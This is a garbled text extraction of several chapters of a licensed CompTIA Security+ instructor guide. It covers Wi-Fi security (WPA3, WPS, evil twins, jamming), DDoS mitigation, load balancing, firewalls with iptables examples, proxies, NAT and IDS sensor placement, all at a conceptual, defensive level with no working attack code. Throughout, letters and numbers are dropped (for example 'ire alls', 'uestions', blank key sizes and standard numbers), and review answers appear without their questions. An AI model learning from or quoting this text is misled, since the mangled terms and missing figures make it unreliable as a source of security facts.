example, the . G z band allows legacy connections with PA -Personal security, while the G z ou could ask students
network is for 0 .11ax ( i- i 6) capable devices using PA -SAE authentication. to try some of the
(Screenshot used with permission from TP- ink Technologies.) emulators available
from vendor sites.
The emulator shown
Neither nor the original A version are considered secure enough for continued
in the screenshot is at
use. A uses the Advanced ncryption tandard A cipher with bit keys, emulator.tp-link.com/
deployed within the Counter Mode with Cipher Block Chaining Message Authentication Archer_AX20v1_US_
Code rotocol CCM . A replaces C and CCM replaces T I . CCM provides simulator/#wireless
authenticated encryption, which is designed to make replay attacks harder. SettingsAdv.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
238 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
eaknesses have also been found in A , however, which has led to its intended
replacement by A . The main features of A are as follows
• Simultaneous Authentication of Equals (SAE) replaces A's way handshake
authentication and association mechanism with a protocol based on Diffie ellman
key agreement.
• pdated cryptographic protocols replaces A CCM with the AES Galois Counter
Mode Protocol (GCMP) mode of operation. Enterprise authentication methods must
use bit A , while personal authentication can use either bit or bit.
i- i performance also depends on support for the latest 0 .11 standards. The most
recent generation ( 0 .11ax) is being marketed as i- i 6. The earlier standards are
retroactively named i- i ( 0 .11ac) and i- i ( 0 .11n). The performance standards
are developed in parallel with the PA security specifications. ost i- i 6 devices and
some i- i and i- i products should support PA , either natively or with a firmware
driver update.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 239
handshake to obtain the hash value and try to use an o ine brute force or dictionary
attack to recover the password. Dragon y also implements ephemeral session keys,
providing forward secrecy.
The configuration interfaces for access points can use different labels for these methods.
You might see PA -Personal and PA -SAE rather than PA -PS and PA -Personal, for
example. Additionally, an access point can be configured for PA only or with support for
legacy PA ( PA -Personal Transition mode). esearchers already found aws in PA -
Personal, one of which relies on a downgrade attack to use PA (wi-fi.org security-update-
april- 01 ).
As setting up an access point securely is relatively comple for residential consumers, i i rotected etup
vendors have developed a system to automate the process called Wi-Fi Protected
Setup (WPS). To use , both the access point and wireless station client device
must be capable. Typically, the devices will have a push button. Activating this on
the access point and the adapter simultaneously will associate the devices using a IN,
then associate the adapter with the access point using A . The system generates a
random ID and . If the devices do not support the push button method, the IN
printed on the A can be entered manually.
nfortunately, is vulnerable to a brute force attack. hile the IN is eight
characters, one digit is a checksum and the rest are verified as two separate INs of
four and three characters. These separate INs are many orders of magnitude simpler
to brute force, typically re uiring ust hours to crack. n some models, disabling
through the admin interface does not actually disable the protocol, or there is
no option to disable it. ome A s can lock out an intruder if a brute force attack is
detected, but in some cases the attack can ust be resumed when the lockout period
e pires. To counter this, the lockout period can be increased. owever, this can leave
A s vulnerable to a denial of service Do attack. hen provisioning a A , it is
essential to verify what steps the vendor has taken to make their implementation
secure and the firmware level re uired to assure security.
The asy Connect method, announced alongside A , is intended to replace as
a method of securely configuring client devices with the information re uired to access
a i i network. asy Connect is a brand name for the Device rovisioning rotocol
D . ach participating device must be configured with a public private key pair. asy
Connect uses uick response codes or near field communication N C tags to
communicate each device's public key. A smartphone is registered as an Easy Connect
configurator app, and associated with the A using its code. ach client device can
then be associated by scanning its code or N C tag in the configurator app. As well
as fi ing the security problems associated with , this is a straightforward means of
configuring headless Internet of Things IoT devices with i i connectivity.
Open Authentication
and Captive ortals
Open Authentication and Captive Portals
Teaching
Selecting open authentication means that the client is not required to authenticate. Tip
This mode would be used on a public A or hotspot . In A , this also means Make sure students
that data sent over the link is unencrypted. Open authentication may be combined understand risks from
with a secondary authentication mechanism managed via a browser. When the client open access points.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
240 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
associates with the open hotspot and launches the browser, the client is redirected
to a captive portal or splash page. This will allow the client to authenticate to the
hotspot provider's network over TT , so the login is secure . The portal may also
be designed to enforce terms and conditions and/or take payment to access the
i i service.
hen using open wireless, users must ensure they send confidential web data only
over TT connections and only use email, oI , IM, and file transfer services with
L TL enabled. Another option is for the user to oin a irtual rivate Network
N . The user would associate with the open hotspot then start the N connection.
This creates an encrypted tunnel between the user's computer and the N
server. This allows the user to browse the web or connect to email services without
anyone eavesdropping on the open Wi-Fi network being able to intercept those
communications. The N could be provided by the user's company or they could use
a third party N service provider. f course, if using a third party, the user needs to
be able to trust them implicitly. The N must use certificate based tunneling to set up
the "inner" authentication method.
A can implement a mode called i i nhanced pen, which uses opportunistic
Show Slide(s) wireless encryption . uses the Dragon y handshake to agree ephemeral
session keys on oining the network. This means that one station cannot sni the traffic
nterprise I . from another station, because they are using di erent session keys. There is still no
Authentication authentication of the access point, however.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 241
Using Cisco s irtual ireless A Controller to set security policies for a A this policy enforces
use of PA and the use of 0 .1 (Enterprise) authentication.
(Screenshot used with permission from Cisco.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
242 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 243
Most implementations of A use a ADI server to validate the authentication ADI ederation
credentials for each user supplicant . ADI federation means that multiple
organi ations allow access to one another's users by oining their ADI servers into a
ADI hierarchy or mesh. or e ample, when ob from widget.foo needs to log on to
grommet.foo's network, the ADI server at grommet.foo recogni es that ob is not
a local user but has been granted access rights and routes the request to widget.foo's
ADI server.
ne e ample of ADI federation is the eduroam network eduroam.org , which
allows students of universities from several di erent countries to log on to the
networks of any of the participating institutions using the credentials stored by their
"home" university.
A rogue access point is one that has been installed on the network without ogue Access oints
authori ation, whether with malicious intent or not. It is vital to periodically survey and Evil Twins
the site to detect rogue A s. A malicious user can set up such an access point with
something as basic as a smartphone with tethering capabilities, and a non malicious Teaching
user could enable such an access point by accident. If connected to a LAN without Tip
security, an unauthori ed A creates a backdoor through which to attack the Stress the importance
network. A rogue A could also be used to capture user logon attempts, allow man of disabling unused
in the middle attacks, and allow access to private information. connections and
services and scanning
A rogue A mas uerading as a legitimate one is called an evil twin. An evil twin for rogue systems.
might ust have a similar name ID to the legitimate one, or the attacker might use
some Do techni ue to overcome the legitimate A . This attack will not succeed
if authentication security is enabled on the A , unless the attacker also knows the
details of the authentication method. owever, the evil twin might be able to harvest
authentication information from users entering their credentials by mistake.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
244 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Surveying i- i networks using Cambium etworks (formerly irrus) i- i Inspector ote the presence
of print devices configured with open authentication (no security) and a smart T appliance
(re uiring authentication). (Screenshot used with permission from irrus.)
A rogue hardware A can be identified through physical inspections. There are also
various i i analy ers and monitoring systems that can detect rogue A s, including
in IDer metageek.com/products/inssider , ismet kismetwireless.net , and Cambium
Networks formerly irrus i i Inspector cambiumnetworks.com/products/software/
wifi designer and wifi inspector .
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 245
A packet, and replaying this rapidly, causing the A to cycle through I values
uickly, revealing the hash part.
A and A are not vulnerable to IV attacks, but a serious vulnerability was
discovered in krackattacks.com . A AC attack uses a replay mechanism
that targets the way handshake. AC is e ective regardless of whether the
authentication mechanism is personal or enterprise. It is important to ensure both
clients and access points are fully patched against such attacks.
A wireless network can be disrupted by interference from other radio sources. These Jamming Attacks
are often unintentional, but it is also possible for an attacker to purposefully am
an access point. This might be done simply to disrupt services or to position an evil
twin on the network with the hope of stealing data. A Wi-Fi jamming attack can be
performed by setting up a A with a stronger signal. i i amming devices are
also widely available, though they are often illegal to use and sometimes to sell. uch
devices can be very small, but the attacker still needs to gain fairly close physical
proximity to the wireless network.
The only ways to defeat a amming attack are either to locate the o ending radio
source and disable it, or to boost the signal from the legitimate e uipment. A s
for home and small business use are not often configurable, but the more advanced
wireless access points, such as Cisco's Aironet series, support configurable power
level controls. The source of interference can be detected using a spectrum analyzer.
nlike a i i analy er, a spectrum analy er must use a special radio receiver i
i adapters filter out anything that isn't a i i signal . They are usually supplied as
handheld units with a directional antenna, so that the e act location of the interference
can be pinpointed.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
246 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Wireless Infrastructure
Answer the following uestions
1. True or false? Band selection has a critical impact on all aspects of the
security of a wireless network?
alse band selection can a ect availability and performance but does not have an
impact in terms of either confidentiality or integrity.
ou need a wireless controller to configure and manage the access points. This makes
each access point more tamper-proof as there is no local administration interface.
Configuration errors should also be easier to identify.
This is a type of group authentication used when the infrastructure for authenticating
securely via ADI , for instance is not available. The system depends on the strength
of the passphrase used for the key.
No, an enterprise network will use ADI authentication. uses and there are
weaknesses in the protocol.
5. You want to deploy a wireless network where only clients with domain-
issued di ital certificates can oin the net or hat t pe o authentication
mechanism is suitable?
A TL is the best choice because it re uires that both server and client be installed
with valid certificates.
Evil twin.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 247
Topic 9D
Implement Load Balancers
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
248 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
The Network Time Protocol (NTP) can be abused in a similar way. NT helps servers
on a network and on the Internet to keep the correct time. It is vital for many protocols
and security mechanisms that servers and clients be synchroni ed. ne NT uery
monlist can be used to generate a response containing a list of the last machines
that the NT server has contacted. As with the amplification attac , this allows a
short request to direct a long response at the victim network.
As well as being the target of an attack, embedded systems might be used as bots. Any type
of Internet-enabled device is vulnerable to compromise. This includes web-enabled cameras,
SOHO routers, and smart TVs and other appliances. This is referred to as an Internet of
Things (IoT) botnet.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 249
hen a network is faced with a DDo or similar ooding attack, an I can use either an
access control list ACL or a blackhole to drop packets for the a ected I address es . A
blackhole is an area of the network that cannot reach any other part of the network. The
blackhole option is preferred, as evaluating each packet in a multi gigabit stream against
ACLs overwhelms the processing resources available. A standard method of doing this
with border gateway protocol routing is called a remotely triggered blackhole
(RTBH) cisco.com/c/dam/en_us/about/security/intelligence/blackhole.pdf . The blackhole
also makes the attack less damaging to the I 's other customers. ith both approaches,
legitimate traffic is discarded along with the DDo packets.
Another option is to use sinkhole routing so that the traffic ooding a particular I address
is routed to a di erent network where it can be analy ed. otentially some legitimate traffic
could be allowed through, but the real advantage is to identify the source of the attack
and devise rules to filter it. The target can then use low TTL DN records to change the I
address advertised for the service and try to allow legitimate traffic past the ood.
There are cloud oS mitigation services that can act as sinkhole network providers and try
to scrub ooded traffic.
A load balancer distributes client requests across available server nodes in a farm or Load Balancing
pool. This is used to provision services that can scale from light to heavy loads, and to
provide mitigation against DDoS attacks. A load balancer also provides fault tolerance. If
there are multiple servers available in a farm, all addressed by a single name I address
via a load balancer, then if a single server fails, client re uests can be routed to another
server in the farm. ou can use a load balancer in any situation where you have multiple
servers providing the same function. amples include web servers, front end email
servers, and web conferencing, A conferencing, or streaming media servers.
There are two main types of load balancers
• Layer load balancer basic load balancers make forwarding decisions on I
address and TC D port values, working at the transport layer of the I model.
• Layer load balancer content switch as web applications have become more
comple , modern load balancers need to be able to make forwarding decisions
based on application level data, such as a re uest for a particular L or data types
like video or audio streaming. This re uires more comple logic, but the processing
power of modern appliances is sufficient to deal with this.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
250 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Scheduling
The scheduling algorithm is the code and metrics that determine which node is
selected for processing each incoming request. The simplest type of scheduling is
called round robin; this just means picking the next node. Other methods include
picking the node with the fewest connections or the best response time. Each method
can also be weighted, using administrator set preferences or dynamic load information
or both.
The load balancer must also use some type of heartbeat or health check probe to verify
whether each node is available and under load or not. Layer 4 load balancers can only
make basic connectivity tests while layer appliances can test the application's state,
as opposed to only verifying host availability.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 251
In a standard active passive configuration, each active node must be matched by a passive
node. There are +1 and + configurations that provision fewer passive nodes than active
nodes, to reduce costs.
Application Clustering
Clustering is also very commonly used to provision fault tolerant application services.
If an application server su ers a fault in the middle of a session, the session state data
will be lost. Application clustering allows servers in the cluster to communicate session
information to one another. or e ample, if a user logs in on one instance, the ne t
session can start on another instance, and the new server can access the cookies or
other information used to establish the login.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
252 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
3. If the switch supports o , it uses the . p header to prioriti e the frame. Note
that it can only do this by holding a ueue of outgoing traffic and delaying non
priority frames. If the ueue is full, a traffic policing policy must state whether
non priority frames should be dropped, or whether the ueue should be cleared
at the e pense of reducing o .
4. A similar process occurs at routers and load balancers on the network edge,
though they can inspect the Di erv I packet header, rather than having to rely
on the more limited . p header. Note that prioriti ation always takes place on
the outbound interface, with low priority traffic being held in a ueue.
There are many variations on this process. odern layer switches can inspect SCP
values, rather than relying on 0 .1p tagging, for instance. oS may need to take place over
wireless networks, which use a different tagging mechanism. There is also a wholly different
approach to oS called IntServ. This uses the esource eservation Protocol ( S P) to
negotiate a link with the performance characteristics re uired by the application or policy.
o marking introduces the potential for Do attacks. If a threat actor can craft
packets that are treated as high priority and send them at a high rate, the network
can be overwhelmed. art of o involves identifying trust boundaries to establish a
legitimate authority for marking traffic. ou should also ensure that there is always
sufficient bandwidth for security critical monitoring data and network management
configuration traffic.
or more information, consider these case studies and design overviews from icrosoft
(docs.microsoft.com en-us skypeforbusiness optimizing-your-network expressroute-and-
os-in-skype-for-business-online) and Cisco (cisco.com c en us td docs solutions Enterprise
A and A oS S oS-S - ook oSIntro.html).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 253
Review Activity:
Load Balancers
Answer the following uestions
Most attacks depend on overwhelming the victim. This typically requires a large
number of hosts, or bots.
here the attacker spoofs the victim's I in re uests to several re ecting servers often
DN or NT servers . The attacker crafts the re uest so that the re ecting servers
respond to the victim's I with a large message, overwhelming the victim's bandwidth.
The algorithm and metrics that determine which node a load balancer picks to handle a
request.
True.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
254 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 9
Summary
Teaching ou should be able to use segmentation based network designs and provision
Tip switching, routing, i i, and load balancing technologies for secure network access.
Check that students
are confident about
the content that has
uidelines or Implementin ecure et or esi ns
been covered. If there
ollow these guidelines when you implement designs for new or e tended networks
is time, re visit any
content examples that • Identify business work ows and the servers, clients, and protocols that support
they have questions them. Design segmented network zones or blocks that support the security
about. If you have
used all the available
re uirements, using LANs, subnets, and firewall policies to implement the design.
time for this lesson
block, note the issues,
• Accommodate special re uirements within the design
and schedule time for
a review later in the
• Demilitarized zone topologies for Internet-facing hosts.
course.
• East-west and zero trust designs for data centers.
• Deploy switching and routing appliances and protocols to support each block,
accounting for loop protection, port security, and route security.
• pen authentication can be used for guest networks, so long as the risks are
understood.
• Evaluate risks from denial of service and design load balanced and clustered
services to provision high availability and fault tolerance.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Lesson 10
Implementing Network
Security Appliances
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
256 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic A
Implement ire alls and roxy Ser ers
• ort filtering security accepting or denying a packet on the basis of source and
destination port numbers TC or D application type .
There may be additional functionality in some products, such as the ability to block
some types of ICM ping traffic but not others, or the ability to filter by hardware
MAC address. Another distinction that can be made is whether the firewall can control
only inbound traffic or both inbound and outbound traffic. This is also often referred to
as ingress and egress traffic or filtering. Controlling outbound traffic is useful because it
can block applications that have not been authori ed to run on the network and defeat
malware, such as backdoors. Ingress and egress traffic is filtered using separate ACLs.
Stateless Operation
A basic packet filtering firewall is stateless. This means that it does not preserve
information about network sessions. ach packet is analy ed independently, with
no record of previously processed packets. This type of filtering re uires the least
processing e ort, but it can be vulnerable to attacks that are spread over a se uence
of packets. A stateless firewall can also introduce problems in traffic ow, especially
when some sort of load balancing is being used or when clients or servers need to use
dynamically assigned ports.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 257
A stateful inspection firewall addresses these problems by tracking information about Stateful Inspection
the session established between two hosts, or blocking malicious attempts to start a Firewalls
bogus session. The vast ma ority of firewalls now incorporate some level of stateful
inspection capability. ession data is stored in a state table. When a packet arrives, the Teaching
firewall checks it to confirm whether it belongs to an e isting connection. If it does not, Tip
it applies the ordinary packet filtering rules to determine whether to allow it. nce the Note that very few,
connection has been allowed, the firewall usually allows traffic to pass unmonitored, in if any, firewalls are
order to conserve processing e ort. wholly stateless
anymore. The
principal distinction
is between firewalls
that track state at the
transport layer and
those that can monitor
application sessions.
State table in the pfSense firewall appliance. (Screenshot used with permission
from ubicon Communications, C.)
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
258 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
pfSense firewall rule configuration Advanced settings allow maximums for states and
connections to be applied. (Screenshot used with permission from pfsense.org.)
Teaching
iptables
Tip iptables is a command line utility provided by many Linu distributions that allows
iptables is referenced administrators to edit the rules enforced by the Linu kernel firewall linu .die.net
in Network , but not man iptables . iptables works with chains, which apply to the di erent types of
in Security+, so we traffic, such as the IN T chain for traffic destined for the local host. ach chain has
include it here as a
recap. If students
a default policy set to D or ALL traffic that does not match a rule. ach rule,
have not completed processed in order, determines whether traffic matching the criteria is allowed or
Network+, make sure dropped.
they know the basics
of how it operates The command iptables --list INPUT --line-numbers -n will show
and how to read the the contents of the IN T chain with line numbers and no name resolution. The rules
output. in the following e ample drop any traffic from the specific host at . . . and allow
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 259
ICM echo re uests pings , DN , and TT TT traffic either from the local subnet
. . . or from any network . . .
Chain INPUT (policy DROP)
# target prot opt source destination
1 DROP all -- 10.1.0.192 0.0.0.0/0
2 ACCEPT icmp -- 10.10.0.0/24 0.0.0.0/0 icmptype 8
3 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53
4 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53
5 ACCEPT tcp -- 10.1.0.0/24 0.0.0.0/0 tcp dpt:80
6 ACCEPT tcp -- 10.1.0.0/24 0.0.0.0/0 tcp dpt:443
7 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 ctstate
RELATED,ESTABLISHED
The destination . . . means anywhere. hen set on the IN T chain, the e ect
is to match any IP address that the local host is currently using. The ctstate rule is
a stateful rule that allows any traffic that is part of an established or related session. Show Slide(s)
As established connections should already have been allowed, this reduces processing
re uirements to minimi e impact on traffic ow.
Firewall
The following command will insert a new rule as line to allow traffic to the server Implementation
TC port from the local subnet
Teaching
iptables -I INPUT 2 -p tcp -s 10.1.0.0/24 --dport 22 Tip
-j ACCEPT
irewalls can be
Di erent switches can be used to append -A , delete -D , or replace -R rules. implemented in
many di erent
ways. They are often
ire all Implementation implemented as a
function within a
ou should consider how the firewall is implemented as hardware or software, for product, as well as
the dedicated security
instance to cover a given placement or use on the network. ome types of firewalls
appliances.
are better suited for placement at the network edge or onal borders others are
designed to protect individual hosts. Interaction
Opportunity
Firewall Appliances
As with most of these
An appliance fire all is a stand alone hardware firewall deployed to monitor traffic security appliances,
it is best to look at
passing into and out of a network one. A firewall appliance can be deployed in two the features of actual
ways: products, rather than
depend too much
• outed layer the firewall performs forwarding between subnets. ach interface
on categorizations.
on the firewall connects to a di erent subnet and represents a di erent security Refer students to
zone. vendor sites such
as barracuda.
• ridged layer the firewall inspects traffic passing between two nodes, such com, checkpoint.
as a router and a switch. This is also referred to as transparent mode. The firewall com,fortinet.com,
does not have an I interface e cept for configuration management . It bridges the or pfsense.org. Get
thernet interfaces between the two nodes. Despite performing forwarding at layer students to visit one
site per group and
, the firewall can still inspect and filter traffic on the basis of the full range of packet then compare features
headers. The typical use case for a transparent firewall is to deploy it without having supported by the
to reconfigure subnets and reassign I addresses on other devices. di erent vendors.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
260 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Cisco ASA (Adaptive Security Appliance) AS (Adaptive Security evice anager) interface.
(Screenshot used with permission from Cisco.)
A router fire all or firewall router appliance implements filtering functionality as part
of the router firmware. The di erence is that a router appliance is primarily designed
for routing, with firewall as a secondary feature. Internet router modems come
with a firewall built in, for e ample.
Application-Based Firewalls
Firewalls can also run as software on any type of computing host. There are several
types of application based firewalls
• ost ased fire all (or personal fire all implemented as a software
application running on a single host designed to protect that host only. As well as
enforcing packet filtering ACLs, a personal firewall can be used to allow or deny
software processes from accessing the network.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 261
The amount of rebuilding depends on the proxy. Some proxies may only manipulate the
IP and TCP headers. Application-aware proxies might add or remote TTP headers. A deep
packet inspection proxy might be able to remove content from an TTP payload.
Configuring content filter settings for the S uid proxy server (s uid-cache.org) running on pfSense.
The filter can apply AC s and time-based restrictions, and use blacklists to prohibit access to U s.
(Screenshot used with permission from ubicon Communications, C.)
The main benefit of a pro y is that client computers connect to a specified point on
the perimeter network for web access. The pro y can be positioned within a DM .
This provides for a degree of traffic management and security. In addition, most web
pro y servers provide caching engines, whereby fre uently re uested web pages
are retained on the pro y, negating the need to re fetch those pages for subse uent
re uests.
A pro y server must understand the application it is servicing. or e ample, a web
pro y must be able to parse and modify TT and TT commands and potentially
TML and scripts too . ome pro y servers are application specific others are
multipurpose. A multipurpose pro y is one configured with filters for multiple protocol
types, such as TT , T , and MT .
ro y servers can generally be classed as non transparent or transparent.
• A non-transparent proxy means that the client must be configured with the pro y
server address and port number to use it. The port on which the pro y server
accepts client connections is often configured as port .auto
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
262 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring transparent proxy settings for the S uid proxy server (s uid-cache.org) running on pfSense.
(Screenshot used with permission from ubicon Communications, C.)
A proxy autoconfiguration (PAC) script allows a client to configure proxy settings without
user intervention. The eb Proxy Autodiscovery ( PA ) protocol allows browsers to locate
a PAC file. This can be an attack vector, as a malicious proxy on the local network can be
used to obtain the user s hash as the browser tries to authenticate (nopsec.com/responder-
beyond-wpad).
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 263
Sample firewall ruleset configured on pfSense. This ruleset blocks all traffic from bogon networks and
a specific private address range but allows any TTP, TTPS, or S TP traffic from any other source.
(Screenshot used with permission from ubicon Communications, C.)
ach rule can specify whether to block or allow traffic based on several parameters,
often referred to as tuples. If you think of each rule being like a row in a database, the
tuples are the columns. or e ample, in the previous screenshot, the tuples include
rotocol, ource address , ource ort, Destination address , Destination ort, and
so on.
ven the simplest packet filtering firewall can be comple to configure securely. It is
essential to create a written policy describing what a filter ruleset should do and to test
the configuration as far as possible to ensure that the ACLs you have set up work as
intended. Also test and document changes made to ACLs. ome other basic principles
include:
• lock incoming re uests from internal or private I addresses that have obviously
been spoofed .
• lock incoming re uests from protocols that should only be functioning at a local
network level, such as ICM , D C , or routing protocol traffic.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
264 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A NAT gateway is a service that translates between the private addressing scheme
used by hosts on the LAN and the public addressing scheme used by router, firewall,
or pro y server on the network edge. NAT provides security in the sense that it can
manage ingress and egress traffic at well defined points on the network edge, but it is
important to reali e that it does not perform a filtering function.
There are several types of NAT
• tatic and dynamic source NAT perform mappings between private inside
local network address and public inside global addresses. These mappings can
be static or dynamically assigned.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 265
Configuring port forwarding on a pfSense firewall appliance This rule forwards any TTP
traffic received on the appliance s A interface to the 10.1.0.10 host on the A .
(Screenshot used with permission from pfsense.org.)
The larger IPv6 address space makes most use cases for AT redundant. A host can use a
link-local address to contact neighboring nodes, but any routed traffic should use a globally
uni ue address. In IPv6 it is routing policies and firewall filtering that manage which hosts
and networks are reachable. That said, there are mechanisms for translating prefixes at the
network edge ( PTv6) and for translation between IPv6 addresses ( AT66) or IPv6 and IPv
addresses ( AT6 and AT 6).
irtual firewalls are usually deployed within data centers and cloud services. A virtual irtual irewalls
firewall can be implemented in three di erent ways
• ypervisor based this means that filtering functionality is built into the hypervisor Teaching
or cloud provisioning tool. ou can use the cloud's web app or application Tip
programming interface A I to write access control lists ACLs for traffic arriving or Note that we will
leaving a virtual host or virtual network. cover cloud security in
more detail in another
• irtual appliance this refers to deploying a vendor firewall appliance instance using lesson.
virtuali ation, in the same way you might deploy a indows or Linu guest .
hile they can be deployed like regular firewalls for one based routing and filtering,
virtual firewalls most significant role is to support the east west security and ero trust
microsegmentation design paradigms. They are able to inspect traffic as it passes from
host to host or between virtual networks, rather than re uiring that traffic be routed
up to a firewall appliance and back.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
266 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Mostly proprietary developed from a Linu kernel, but with proprietary features
added. amples include Check oint I , orti ate orti , and onicwall. Any
code developed from a L source should be available, but in general terms these
products cannot be used independently of a commercial contract with the vendor.
• holly open souce these can be used independently of the vendor, but the
vendors typically have commercial appliances and support contracts too. amples
include pfSense and Smoothwall.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 267
e ie Acti ity
ire alls and roxy Ser ers
Answer the following uestions
1. True or False? As they protect data at the highest layer of the protocol
stac application ased fire alls ha e no asic pac et filterin
functionality.
alse. All firewall types can perform basic packet filtering by I address, protocol type,
port number, and so on .
2. hat distin uishes host ased personal so t are fire all rom a net or
fire all appliance
A personal firewall software can block processes from accessing a network connection
as well as applying filtering rules. A personal firewall protects the local host only, while
a network firewall filters traffic for all hosts on the segment behind the firewall.
3. True or alse hen deplo in a non transparent pro ou must confi ure
clients with the proxy address and port.
True.
True.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
268 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 10B
Implement Network
Security onitoring
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 269
iewing an intrusion detection alert generated by Snort in the ibana app on Security Onion.
(Screenshot Security Onion securityonion.net)
Typically, the packet capture sensor is placed inside a firewall or close to a server of TA s and ort Mirrors
particular importance. The idea is usually to identify malicious traffic that has managed
to get past the firewall. A single ID can generate a very large amount of logging and Teaching
alerting data so you cannot ust put multiple sensors everywhere in the network Tip
without provisioning the resources to manage them properly. Depending on network Make sure students
si e and resources, one or ust a few sensors will be deployed to monitor key assets or can distinguish
network paths. between appropriate
locations for sensors
There are three main options for connecting a sensor to the appropriate point in the and the location of
network: the collection/analysis
engine.
• SPAN (switched port analyzer)/mirror port this means that the sensor is
attached to a specially configured port on the switch that receives copies of frames
addressed to nominated access ports or all the other ports . This method is not
completely reliable. rames with errors will not be mirrored and frames may be
dropped under heavy load.
• Passive test access point (TAP) this is a bo with ports for incoming and outgoing
network cabling and an inductor or optical splitter that physically copies the signal
from the cabling to a monitor port. There are types for copper and fiber optic
cabling. nlike a AN, no logic decisions are made so the monitor port receives
every frame corrupt or malformed or not and the copying is una ected by load.
• Active TA this is a powered device that performs signal regeneration again, there
are copper and fiber variants , which may be necessary in some circumstances.
igabit signaling over copper wire is too comple for a passive tap to monitor and
some types of fiber links may be adversely a ected by optical splitting. ecause it
performs an active function, the TA becomes a point of failure for the links in the
event of power loss. hen deploying an active TA , it is important to use a model
with internal batteries or connect it to a .
A TA will usually output two streams to monitor a full duple link one channel for
upstream and one for downstream . Alternatively, there are aggregation TA s, which
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
270 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
rebuild the streams into a single channel, but these can drop frames under very
heavy load.
Snort rules file supplied by the open-source Emerging Threats community feed.
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 271
The signatures and rules often called plug ins or feeds powering intrusion detection
need to be updated regularly to provide protection against the latest threat types.
